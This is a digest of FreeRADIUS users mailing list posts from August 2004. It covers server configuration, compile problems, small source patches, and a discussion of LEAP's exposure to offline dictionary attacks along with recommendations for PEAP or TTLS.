On Tue, Aug 31, 2004 at 04:01:17PM +0200, Bastien wrote: Hunt groups are defined in huntgroups file like: huntgroups COM21 NAS-IP-Address = 192.168.1.1 Cisco-Gateway-Id = COM21 COM22 NAS-IP-Address = 192.168.2.1 NAS-IP-Address = 192.168.2.2 /huntgroups The Huntgroup-Name attribute will be appended automatically. Thats all clear for me, the only thing i wanna do now, is add the Huntgroup-Name variable into the detailfile. example: detailfile = ${radacctdir}//detail-${Huntgroup-Name} I tried to do this but it just ignores it. I tried using an % instead of an $, but then the server wont even start. greets, Erik -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] De la part de Erik Immers Envoyé : mardi 31 août 2004 10:34 À : [EMAIL PROTECTED] Objet : Re: Accounting issue On Mon, Aug 30, 2004 at 10:36:56AM -0400, Alan DeKok wrote: Erik Immers [EMAIL PROTECTED] wrote: Is there within freeradius (0.8.1) the possibility to log to 2 detail files depending on the NAS. You should upgrade to 1.0.0. And the detail file is configurable. See the comments in radiusd.conf. The comments indeed speak of a configurable detail file. But what we want to achieve is that one half of the nasses log to 1 detail file, end the other half to another detail file. As far as i see it is only possible to, or put everything in 1 detail file, or every nas in its own detail file. The only option i can think of is to do something with the huntgroup name, but i dont see any option to put that into the detail section of radiusd. Might it be possible to create an variable in the users file to use that in the radiusd.conf, or something that will give me the same result. Example : add the variable HUNTGROUP-NAME to the users file, and add it to the detail section in the radiusd.conf users file steve Auth-Type := Local, User-Password == testing Service-Type = Framed-User, Framed-Protocol = PPP, Framed-IP-Address = 172.16.3.33, Framed-IP-Netmask = 255.255.255.0, Framed-Routing = Broadcast-Listen, Framed-Filter-Id = std.ppp, Framed-MTU = 1500, Framed-Compression = Van-Jacobsen-TCP-IP, HUNTGROUP-NAME=com21 /users file radiusd.conf detailfile = ${radacctdir}//detail-${HUNTGROUP-NAME} /radiusd.conf Sorry if my explanation isnt all that clear. Erik Immers Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
mysql module problem
Hi, im new in the list and i want to share my problem with you. Im trying to authenticate an user and i got this: rlm_sql (sql): Pairs do not match for user [110] rlm_sql (sql): Released sql socket id: 10 modcall[authorize]: module sql returns notfound modcall: group authorize returns ok auth: No authenticate method (Auth-Type) configuration found for the request: Rejecting the user auth: Failed to validate the user. Login incorrect: [] (from client x.x.x.x port 0) Sending Access-Reject of id 245 to x.x.x.x:1812 Please, i need help. Thanks in advance. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Bug/security EAP-TLS
Sorry I haven't checked this yes. I'll be testing it today. We just got done with a major electrical repair on campus. They took down the power to the entire campus for about 36 hours, so we had to power down our entire infrastructure then bring it back up yesterday. Suffice it to say that this weekend has been a long one. --Mike On Tue, 2004-08-31 at 09:51, Alan DeKok wrote: Joey Nix [EMAIL PROTECTED] wrote: So will it be: case handshake: if (tls_session-info.handshake_type == finished) { DEBUG2( rlm_eap_tls: ack handshake is finished); return EAPTLS_SUCCESS; } DEBUG2( rlm_eap_tls: ack handshake fragment handler); /* Fragmentation handler, send next fragment */ return EAPTLS_REQUEST; Yes. or will it be: case handshake: if (tls_session-info.handshake_type == finished) { DEBUG2( rlm_eap_tls: ack handshake is finished); return EAPTLS_SUCCESS; } default: DEBUG2( rlm_eap_tls: ack default); radlog(L_ERR, rlm_eap_tls: Invalid ACK received: %d, No. That would make it impossible for multi-ack sessions to work, and would require that everything be sent in only one SSL packet. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html -- --Mike --- Michael Griego Wireless LAN Project Manager The University of Texas at Dallas - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Ntlm problem with peap
Hi again, On Tue, 2004-08-31 at 15:49, Alan DeKok wrote: Nuno Miguel Pais Fernandes [EMAIL PROTECTED] wrote: Running 1.0.0 on dual intel so little-endian. Aparently challenge or nt-response are being generated wrongly, or it's a bug in ntlm_auth. I've been running it on an x86 for a while, and I haven't seen any problems like that. Do you suspect problems in xlat or in microsoft supplicant? Any ideias? Is there any workaround to have peap with mschapv2 working without ntlm? Yes, supply a clear-text, or NT-Password. I don't have clear text password but i do have NT-Password (unfortunadly in ldap and not starting with 0x). Could it work? Thanks for all the help.. Nuno Fernandes Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html -- Nuno Miguel Pais Fernandes [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part
Rejecting CallingStationId
I could ban or reject a specific CallingStationID? , the only examples I seen is on a specific user or group of users, on file /etc/users Some nice friends on the list told me to try: DEFAULTCalling-Station-Id =~8183635958, Auth-Type :=Reject I tried it and it works, I tried also some things like DEFAULT Called-Station-Id ==4700,Auth-Type :=Reject DEFAULT Calling-Station-Id ==8183635958, Called-Station-Id ==4700,Auth- Type :=Reject and I think it worked just fine, the question now is, I could have this Called, and Calling stations id in a sql table, so my script for blocking/baning Called or Calling would be in a sql table and not restart radius each time I add a new rule on users file Thanks Armando Leal. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Accounting issue
Erik Immers [EMAIL PROTECTED] wrote: detailfile = ${radacctdir}//detail-${Huntgroup-Name} I tried to do this but it just ignores it. I tried using an % instead of an $, but then the server wont even start. Try using 1.0.0, rather than 0.8.1. I don't even recall if that was configurable in 0.8.1. Alan Dekok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Ntlm problem with peap
Nuno Miguel Pais Fernandes [EMAIL PROTECTED] wrote: I've been running it on an x86 for a while, and I haven't seen any problems like that. Do you suspect problems in xlat or in microsoft supplicant? I have no idea. I don't have clear text password but i do have NT-Password (unfortunadly in ldap and not starting with 0x). Could it work? It should. See src/modules/rlm_mschap/rlm_mschap.c Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re[2]: 1.0.0. Problems with check-radiusd-config and rlm_perl
august, 31 2004 at 21:07:13 Alan wrote: 1. check-radiusd-config doesn't work with 1.0.0. because -p option is deprecated. why? IMHO, check-radiusd-config is userfull, when need to check new config while working instance is running. So option -p have to be (IMHO). The intent is to move to a better way of checking the configuration. i.e. like having the server re-load it's configuration files into a temporary structure, and then revert to the existing configuration if there's a problem reading teh new one. rlm_perl, have to reread scripts-file(s). what happend with perl's instance if there are errors in scripts? i think radiusd will crashes. I always run perl -c radius.pl after editing radius.pl, But running radiusd via check-radiusd-config is more reliably. Some time ago, when rlm_perl was very unstable, i prefer to restart radiusd. now i use rlm_perl from Jul,12 snapshot and it looks very stable. But i prefer restart radiusd anyway. Best Regards, Mike - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Assertion failed
Hello, I was running 2 radius servers in a production environment, running FreeRadius 0.9.3 with SNMP support. Each radius using the same M$ SQL server as a backend via FreeTDS/UnixODBC. Occasionally I saw these errors in radius.log Error: Assertion failed in modcall.c, line 68 Error: Assertion failed in radiusd.c, line 2619 1. I hope this is not to broad a question, but generally what causes these errors? 2. When the errors occur, would it cause radius to stop responding momentarily, cause a crash, or any adverse effects? I have since upgraded both servers to version 1.0.0 and have not seen the errors. However I am trying to do a post mortem an another application that uses our FreeRADIUS and I want to rule out our radius as a possible cause. Thanks, - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How does one compile pam-radius auth???
Well, maybe because I missed something or don't know what I am doing. I found the pam_radius related software on this page: http://www.freeradius.org/related/ Which is exactly what I need, so I downloaded the software and tried to get it to compile. It wouldn't so I tried dropping it into the free radius src tree to see if I could get it to compile, whioh it wouldn't. The documentation for compiling the pam_radius stuff is a little minimal: make Basically I am just trying to get it to compile so I can use it with the an existing radius server. Thanks, Roger On Tue, 31 Aug 2004 10:50:18 -0400, Alan DeKok [EMAIL PROTECTED] wrote: roger weiss [EMAIL PROTECTED] wrote: I have copied the downloaded files to: src/pam-radius and I modified the Makefile in src to include the directory pam-radius. Why? If I don't include the pam-radius in the overall build radius appears tobuild correctly. Why are you including pam-radius in the freeradius build? I don't understand what you're doing, or why you think it's necessary. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Assertion failed
David [EMAIL PROTECTED] wrote: Error: Assertion failed in modcall.c, line 68 Error: Assertion failed in radiusd.c, line 2619 1. I hope this is not to broad a question, but generally what causes these errors? A code path is possible, but not handled. The assertion is there to say we don't know how to handle this. 2. When the errors occur, would it cause radius to stop responding momentarily, cause a crash, or any adverse effects? It would cause the server to die immediately. I have since upgraded both servers to version 1.0.0 and have not seen the errors. 1.0.0 has a number of these bugs fixed. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How does one compile pam-radius auth???
roger weiss [EMAIL PROTECTED] wrote: Which is exactly what I need, so I downloaded the software and tried to get it to compile. It wouldn't so I tried dropping it into the free radius src tree to see if I could get it to compile, whioh it wouldn't. It's not intended to be part of FreeRADIUS. The documentation for compiling the pam_radius stuff is a little minimal: make See also the Makefile, which contains additional documentation. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Radius with 2 clients (gateway and gatekeeper)
I am a new user of FreeRadius, I have the following problem : In our network configuration we have a gateway and a gatekeeper. The gateway is already configured to send authentication and accounting infos to radius, and radius saves the infos in the postgresql database (in a table start-start packets and in a table stop-stop packets) and also write a log file. Now I configured the gatekeeper to send only accounting infos to free radius. Radius saves the infos only in a log file, but not in the database. I think that the gatekeeper logs are different from the gateway logs. Can somebody tell me how to configure the postgres.conf file so that radius save also the gatekeeper logs but in different tables or if I can use mysql for the gatekeeper logs (how to sepa rate gatekeeper's infos and the gateway's infos)? I appreciate also if someboby tell me where to read some docs. Thanks in advance. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Is there some kind of trick to make Cisco LEAP work???
James, We have gotten LEAP to work with Cisco access points. My last posting on the subject might help if you haven't gotten there yet... http://lists.freeradius.org/pipermail/freeradius-users/2004-August/ 035601.html However, we have not been able to get LEAP for Cisco's WDS worked out. All of the access points in the group authenticate successfully, but the WLSE does not. I've looked carefully at the debug output on freeradius as well as the debug output on the master Access Point. Freeradius debug shows that most of the EAP transaction takes place normally. The initial Access-Request, the Identity challenge, the Access-Request response to that, and the new Access-Challenge from radiusd are all just fine. But... the supplicant (WLSE) does NOT answer that final Access-Challenge... at all. Freeradius debug shows no indication of error or mis-configuration. Following this, I scrutinized the radius debug output on the master Access Point. In one test, the AP pointed to the freeradius server. In a second test, the AP pointed to a cisco ACS server (on another AP). Comparing the debug output from these two tests revealed only a small (but significant) difference. The ACS server and freeradius return nearly identical attributes. The first difference is that in the first Access-Challenge, ACS returns Session-Timeout integer of value 10. Freeradius does not return this attribute by default. I'll have it return that attribute in the next test. I doubt that is the problem, but you never know. More significant is the value of State in each Access-Challenge. The ACS server sends a State with 48 octets of data, like this... 3C CE 0B C2 1F C4 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A 8B 02 C7 5F 73 30 72 79 4C BE 81 58 77 08 FC Freeradius sends a State with 16 octets of data, like this... 08 69 18 A9 AF 56 71 B1 2C E9 A9 2A 35 CA D9 94 The RFC on this attribute ( http://www.freeradius.org/rfc/rfc2865.html#State ) says the value is application specific, and I'm not sure which module produces it, how to decode it, etc. But it seems clear to me that this is the fly that choked the horse (Cisco's WLSE leap/eap/radius client being the horse). Can someone who understands the nuances of this State value please help? freeradius-1.0.0 Red Hat Enterprise Linux AS release 3 (Taroon Update 2) openssl-0.9.7a-33.4.i686.rpm openldap-2.2.13 (on localhost) Thanks, Coates Carter University of Richmond ... James D. Munroe [EMAIL PROTECTED] wrote: Has anyone tried or successfully been able to get Cisco-Leap to work using FreeRadius? Lots of people. That's why the feature is there. It's been used for over a year now. If you can't get LEAP to work, I suggest running the server in debugging mode, and reading the FAQ about statements like it doesn't work on this list. LEAP works. If it doesn't work in your setup, debug mode will tell you why. Alan DeKok. .. James D. Munroe [EMAIL PROTECTED] Fri, 25 Jun 2004 17:32:22 -0300 (ADT) Hello, Has anyone tried or successfully been able to get Cisco-Leap to work using FreeRadius? Components: - Cisco AIR-AP1230B-A-K9 Access Points running IOS 12.2.15 Freeradius 0.9.3 installed from the Redhat ES 3.0 RPM, running on a Redhat ES 3.0 Server If so, would it be possible to get sanitized copies of your Freeradius configuration files (radiusd.conf, users, clients.conf, etc...)? Authenication to the AP itself using radius works prefect, have even setup EAP-TLS and it works prefect!! But leap is a no good... It's not a configuration issue on the Access Points themselves. Leap works fine when used against Cisco ACS (v3.2.3). However, for security reasons and cost of course we would like to use Freeradius for outside hosts rather than expose our internal ACS server. Also, I have been unable to get the WDS service working between the AP's and Cisco's WLSE.=A0 I'm not surprised since it uses Leap. It does work though with CiscoACS...but Freeradius is a no go. :-( Any help would be greatly appreciated!! Thanks, Jim - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
[OT] Should anyone even use LEAP
Coates Carter wrote: James, We have gotten LEAP to work with Cisco access points. My last posting on the subject might help if you haven't gotten there yet... I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/ Should LEAP be used in any production environment to ensure security on wireless links? If this is inappropriate to ask, my apologies. -Adam - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How does one compile pam-radius auth???
Maybe you can give a little more information as to what I need to do to compile pam-radius? If I copy it to it's own subdirectory and try and compile it I standalone I get: [EMAIL PROTECTED] pam-radius]# make cc -Wall -fPIC -c pam_radius_auth.c -o pam_radius_auth.o In file included from pam_radius_auth.c:63: pam_radius_auth.h:22:20: radius.h: No such file or directory In file included from pam_radius_auth.h:23, from pam_radius_auth.c:63: /usr/include/md5.h:27: error: syntax error before UINT4 If I modify CFLAGS in Makefile to -I /path/to/freeradius/includes and run make I get: [EMAIL PROTECTED] pam-radius]# make cc -Wall -fPIC -I /root/freeradius-1.0.0/src/include -c pam_radius_auth.c -o pam_radius_auth.o pam_radius_auth.c:163: error: syntax error before ipstr2long pam_radius_auth.c:163: warning: return type defaults to `int' pam_radius_auth.c: In function `ipstr2long': pam_radius_auth.c:168: error: `UINT4' undeclared (first use in this function) I can tell my environment is messed up, I just don't know what I need to do to fix it. Thanks, Roger On Tue, 31 Aug 2004 15:35:55 -0400, Alan DeKok [EMAIL PROTECTED] wrote: roger weiss [EMAIL PROTECTED] wrote: Which is exactly what I need, so I downloaded the software and tried to get it to compile. It wouldn't so I tried dropping it into the free radius src tree to see if I could get it to compile, whioh it wouldn't. It's not intended to be part of FreeRADIUS. The documentation for compiling the pam_radius stuff is a little minimal: make See also the Makefile, which contains additional documentation. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How does one compile pam-radius auth???
FYI - I am on Fedora Core 2 Thanks, Roger On Tue, 31 Aug 2004 15:35:55 -0400, Alan DeKok [EMAIL PROTECTED] wrote: roger weiss [EMAIL PROTECTED] wrote: Which is exactly what I need, so I downloaded the software and tried to get it to compile. It wouldn't so I tried dropping it into the free radius src tree to see if I could get it to compile, whioh it wouldn't. It's not intended to be part of FreeRADIUS. The documentation for compiling the pam_radius stuff is a little minimal: make See also the Makefile, which contains additional documentation. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html -- Get a home for your homepage at http://www.active-server.com - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Is there some kind of trick to make Cisco LEAP work???
Coates Carter [EMAIL PROTECTED] wrote: The ACS server and freeradius return nearly identical attributes. The first difference is that in the first Access-Challenge, ACS returns Session-Timeout integer of value 10. Freeradius does not return this attribute by default. I'll have it return that attribute in the next test. I doubt that is the problem, but you never know. I'm not sure what else it would be. More significant is the value of State in each Access-Challenge. The ACS server sends a State with 48 octets of data, like this... 3C CE 0B C2 1F C4 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A 8B 02 C7 5F 73 30 72 79 4C BE 81 58 77 08 FC Freeradius sends a State with 16 octets of data, like this... 08 69 18 A9 AF 56 71 B1 2C E9 A9 2A 35 CA D9 94 That shouldn't matter. The State attribute is defined to be opaque nonsense, so far as the NAS is concerned. The RFC on this attribute ( http://www.freeradius.org/rfc/rfc2865.html#State ) says the value is application specific, and I'm not sure which module produces it, how to decode it, etc. But it seems clear to me that this is the fly that choked the horse (Cisco's WLSE leap/eap/radius client being the horse). The state is meaningless, other than a series of bytes which the server interprets. It's implementation-specific, and the NAS thinks it means anything. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: [OT] Should anyone even use LEAP
Adam Shelley [EMAIL PROTECTED] wrote: I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/ Should LEAP be used in any production environment to ensure security on wireless links? It's no more vulnerable than MS-CHAP, except that MS-CHAP isn't used in wireless sessions. EAP-TTLS or EAP-PEAP are preferred for wireless. Alan DEKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How does one compile pam-radius auth???
roger weiss [EMAIL PROTECTED] wrote: Maybe you can give a little more information as to what I need to do to compile pam-radius? If I copy it to it's own subdirectory and try and compile it I standalone I get: [EMAIL PROTECTED] pam-radius]# make cc -Wall -fPIC -c pam_radius_auth.c -o pam_radius_auth.o In file included from pam_radius_auth.c:63: pam_radius_auth.h:22:20: radius.h: No such file or directory Weird. There's a radius.h inside that directory, and the compiler should be picking it up. If I modify CFLAGS in Makefile to -I /path/to/freeradius/includes and run make I get: Why not: cc -Wall -fPIC -I. -c pam_radius_auth.c -o pam_radius_auth.o Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: [OT] Should anyone even use LEAP
Yes -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alan DeKok Sent: Tuesday, August 31, 2004 2:01 PM To: [EMAIL PROTECTED] Subject: Re: [OT] Should anyone even use LEAP Adam Shelley [EMAIL PROTECTED] wrote: I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/ Should LEAP be used in any production environment to ensure security on wireless links? It's no more vulnerable than MS-CHAP, except that MS-CHAP isn't used in wireless sessions. EAP-TTLS or EAP-PEAP are preferred for wireless. Alan DEKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: [OT] Should anyone even use LEAP
Hi Adam, If any other alternative exists, then LEAP should not be used. As you've pointed out, LEAP is vulnerable to known published attacks. Even Cisco recommends (their version of ;-) PEAP. Given the requirements placed upon the AP, LEAP is also effectively constrained to Cisco APs. For Microsoft devices, the most straight-forward choice is PEAP/MS-CHAPv2. This is a less flexible choice than EAP-TTLS but doesn't require the purchase of any third party software. Some wireless cards now come with EAP-TTLS supplicants but by no means all of them. There are free (for personal use)/cheap (for commercial use) EAP-TTLS clients (e.g. SecureW2) but this does impose an extra administrative burdon on the operator of the network. Some may not feel that the added flexibility of EAP-TTLS is worth the extra administration. Anyway, to get back to your original question, there are almost no circumstances under which LEAP would be the appropriate choice in a production environment. Regards, Guy -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Adam Shelley Sent: 31 August 2004 21:38 To: [EMAIL PROTECTED] Subject: [OT] Should anyone even use LEAP Coates Carter wrote: James, We have gotten LEAP to work with Cisco access points. My last posting on the subject might help if you haven't gotten there yet... I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/ Should LEAP be used in any production environment to ensure security on wireless links? If this is inappropriate to ask, my apologies. -Adam - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html This e-mail is private and may be confidential and is for the intended recipient only. If misdirected, please notify us by telephone and confirm that it has been deleted from your system and any copies destroyed. If you are not the intended recipient you are strictly prohibited from using, printing, copying, distributing or disseminating this e-mail or any information contained in it. We use reasonable endeavours to virus scan all e-mails leaving the Company but no warranty is given that this e-mail and any attachments are virus free. You should undertake your own virus checking. The right to monitor e-mail communications through our network is reserved by us. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: [OT] Should anyone even use LEAP
ASLEAP uses an offline dictionary attack to crack LEAP passwords. Best practice to use when deploying LEAP is strong user passwords. Amos -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alan DeKok Sent: Tuesday, August 31, 2004 2:01 PM To: [EMAIL PROTECTED] Subject: Re: [OT] Should anyone even use LEAP Adam Shelley [EMAIL PROTECTED] wrote: I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/ Should LEAP be used in any production environment to ensure security on wireless links? It's no more vulnerable than MS-CHAP, except that MS-CHAP isn't used in wireless sessions. EAP-TTLS or EAP-PEAP are preferred for wireless. Alan DEKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: [OT] Should anyone even use LEAP
That places too great a reliance upon the user to maintain a strong password. The strength of the protection should be separated, as far as is technically possible, from the strength of the password. If more resilient mechanisms exist and are implemented just as trivially then it is foolish to use a weaker mechanism. Regards, Guy -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Amos Gregory Sent: 31 August 2004 21:58 To: [EMAIL PROTECTED] Subject: RE: [OT] Should anyone even use LEAP ASLEAP uses an offline dictionary attack to crack LEAP passwords. Best practice to use when deploying LEAP is strong user passwords. Amos -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alan DeKok Sent: Tuesday, August 31, 2004 2:01 PM To: [EMAIL PROTECTED] Subject: Re: [OT] Should anyone even use LEAP Adam Shelley [EMAIL PROTECTED] wrote: I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/ Should LEAP be used in any production environment to ensure security on wireless links? It's no more vulnerable than MS-CHAP, except that MS-CHAP isn't used in wireless sessions. EAP-TTLS or EAP-PEAP are preferred for wireless. Alan DEKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html This e-mail is private and may be confidential and is for the intended recipient only. If misdirected, please notify us by telephone and confirm that it has been deleted from your system and any copies destroyed. If you are not the intended recipient you are strictly prohibited from using, printing, copying, distributing or disseminating this e-mail or any information contained in it. We use reasonable endeavours to virus scan all e-mails leaving the Company but no warranty is given that this e-mail and any attachments are virus free. You should undertake your own virus checking. The right to monitor e-mail communications through our network is reserved by us. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Bug/security EAP-TLS
The patch checked out OK and has been committed. -- --Mike --- Michael Griego Wireless LAN Project Manager The University of Texas at Dallas - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Max number of realms FreeRadius Can handle.
Hello, I am currently running 2 production FreeRadius servers (version 1.0.0) on Redhat 9.0 tied to a single dedicated M$ SQL server backend. The SQL server is used primarily for radius accounting but also contains username/password information for half a dozen realms. The radius servers are used primarily for proxying but we do have some local realms. Both radius servers are identical in terms of hardware, specs and radius configuration. The two radius servers have identical proxy.conf files and are used to split the total load. Setting hardware considerations aside for the moment, what is the max number of realms that FreeRadius can proxy to? I currently proxy to over 60 realms and have to add another 28 realms and I am wondering if it isn't time to redesign things. Thanks, Dave - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How does one compile pam-radius auth???
Actually there isn't a radius.h in that directory. If you go to: http://www.freeradius.org/pam_radius_auth/ to download the pam_radius stuff. I dug around some more and decided to look at the actual ftp server, where I found ftp://ftp.freeradius.org/pub/radius/pam_radius-1.3.16.tar I downloaded that and it compiled without a problem (duh). Might I suggest a link to the tar file on the ftp server from the download page? Thanks for the help. Roger - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How does one compile pam-radius auth???
Correction, might a suggest an id10t error proof link to the ftp site??? :-) Something that says: You MUST get it here? It's been one of those months. Too much to do and too little time. On Tue, 31 Aug 2004 14:48:44 -0700, roger weiss [EMAIL PROTECTED] wrote: Actually there isn't a radius.h in that directory. If you go to: http://www.freeradius.org/pam_radius_auth/ to download the pam_radius stuff. I dug around some more and decided to look at the actual ftp server, where I found ftp://ftp.freeradius.org/pub/radius/pam_radius-1.3.16.tar I downloaded that and it compiled without a problem (duh). Might I suggest a link to the tar file on the ftp server from the download page? Thanks for the help. Roger - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
syslog_facility ignored
relevant portion of radiusd.conf: log_destination = syslog log { # Yes, I read the comment about changing this. syslog_facility = local1 } Using the latest code from CVS on RedHat Linux 8.0, the syslog_facility directive is seemingly ignored and all messages go to /var/log/messages regardless of the setting. The call to syslog in log.c does not OR the level with the facility, so messages are sent to the default facility. That would be fine if openlog were called to set the configured facility, but it resides in rlm_pam.c where it never gets called for my config. The following simple change to log.c resolves the problem, but I suspect it would be preferable to move the openlog call. --- log.c 2004-08-31 14:48:34.0 -0700 +++ log.c.patched 2004-08-31 14:31:53.0 -0700 @@ -194,7 +194,7 @@ lvl = LOG_ERR; break; } - syslog(lvl, %s, buffer + len); /* don't print timestamp */ + syslog(lvl | mainconfig.syslog_facility, %s, buffer + len); /* don't print timestamp */ } #endif - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
FreeRADIUS vulnerabilities
On a packetstorm mirrior this weekend I saw a new RADIUS test package. Downloaded it and noticed there were scripts for exploiting vulnerabilities with FreeRADIUS. Has anyone looked into this package and what is the FreeRADIUS team doing to fix the issues with 1.0 as listed in the exploit. Phorcedaccess - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: syslog_facility ignored
Yeah, I was actually going to put in a somewhat different patch later this evening. --Mike On Tue, 2004-08-31 at 18:41, David Hart wrote: relevant portion of radiusd.conf: log_destination = syslog log { # Yes, I read the comment about changing this. syslog_facility = local1 } Using the latest code from CVS on RedHat Linux 8.0, the syslog_facility directive is seemingly ignored and all messages go to /var/log/messages regardless of the setting. The call to syslog in log.c does not OR the level with the facility, so messages are sent to the default facility. That would be fine if openlog were called to set the configured facility, but it resides in rlm_pam.c where it never gets called for my config. The following simple change to log.c resolves the problem, but I suspect it would be preferable to move the openlog call. --- log.c 2004-08-31 14:48:34.0 -0700 +++ log.c.patched 2004-08-31 14:31:53.0 -0700 @@ -194,7 +194,7 @@ lvl = LOG_ERR; break; } - syslog(lvl, %s, buffer + len); /* don't print timestamp */ + syslog(lvl | mainconfig.syslog_facility, %s, buffer + len); /* don't print timestamp */ } #endif - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Question about use freeradius in MIP
hi all: can freeradius receive IKE Pre-shared Secret Request(Type:26) and send Pre-shared secret? for in MOBILE IP ,HA requires the MN-HA shared key from the RADIUS server, the HA shall send a RADIUS Access-Request that includes a User Name, a User-Password and an MN-HA SPI,The Home RADIUS server shall process the Access-Request. If the MN-HA shared key is requested, the Home RADIUS server shall encrypt the MN-HA shared key in a RADIUS Access-Accept
Re: syslog_facility ignored
Get tomorrow's CVS snapshot. It will be fixed there. --Mike On Tue, 2004-08-31 at 18:41, David Hart wrote: relevant portion of radiusd.conf: log_destination = syslog log { # Yes, I read the comment about changing this. syslog_facility = local1 } Using the latest code from CVS on RedHat Linux 8.0, the syslog_facility directive is seemingly ignored and all messages go to /var/log/messages regardless of the setting. The call to syslog in log.c does not OR the level with the facility, so messages are sent to the default facility. That would be fine if openlog were called to set the configured facility, but it resides in rlm_pam.c where it never gets called for my config. The following simple change to log.c resolves the problem, but I suspect it would be preferable to move the openlog call. --- log.c 2004-08-31 14:48:34.0 -0700 +++ log.c.patched 2004-08-31 14:31:53.0 -0700 @@ -194,7 +194,7 @@ lvl = LOG_ERR; break; } - syslog(lvl, %s, buffer + len); /* don't print timestamp */ + syslog(lvl | mainconfig.syslog_facility, %s, buffer + len); /* don't print timestamp */ } #endif - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: MS-CHAP can't work
Title: RE: MS-CHAP can't work Dear Alan: Thanks for your reply. Is your mean the cisco don't send the authenticate method to freeradius? Is it wrong radius config on cisco? Thank you for your help again. I see so many answers from you. You are really a good teacher. interface Virtual-Template2 ip unnumbered FastEthernet0/0 peer default ip address pool pptp-pool ppp max-bad-auth 4 ppp encrypt mppe auto ppp authentication ms-chap-v2 ppp ms-chap refuse radius-server host 211.79.1.25 auth-port 1645 acct-port 1646 key 7 040A59555B radius-server vsa send authentication Best Regards, Bai. -Original Message- From: Alan DeKok [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 31, 2004 11:04 PM To: [EMAIL PROTECTED] Subject: Re: MS-CHAP can't work =?big5?B?QmFpIKXVqXalTg==?= [EMAIL PROTECTED] wrote: If I try to authenticate to FreeRadius with MS-CHAP, it still hard to work after trying long time. rlm_mschap: No LM/NT password configured. Check authorization. modcall[authenticate]: module mschap returns invalid ... Who can comment what's happen? Thank you very much!!! You have to tell the server what password to use to authenticate the user. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html ADSL [+]$4399, "", !!http://www.ttn.com.tw/wlan , http://www.ttn.net; TTN, 0800-093-636 This message (and any attachments) may contain information that is confidential, proprietary, privileged or otherwise protected by law. The message is intended solely for the named addressee (or a person responsible for delivering it to the 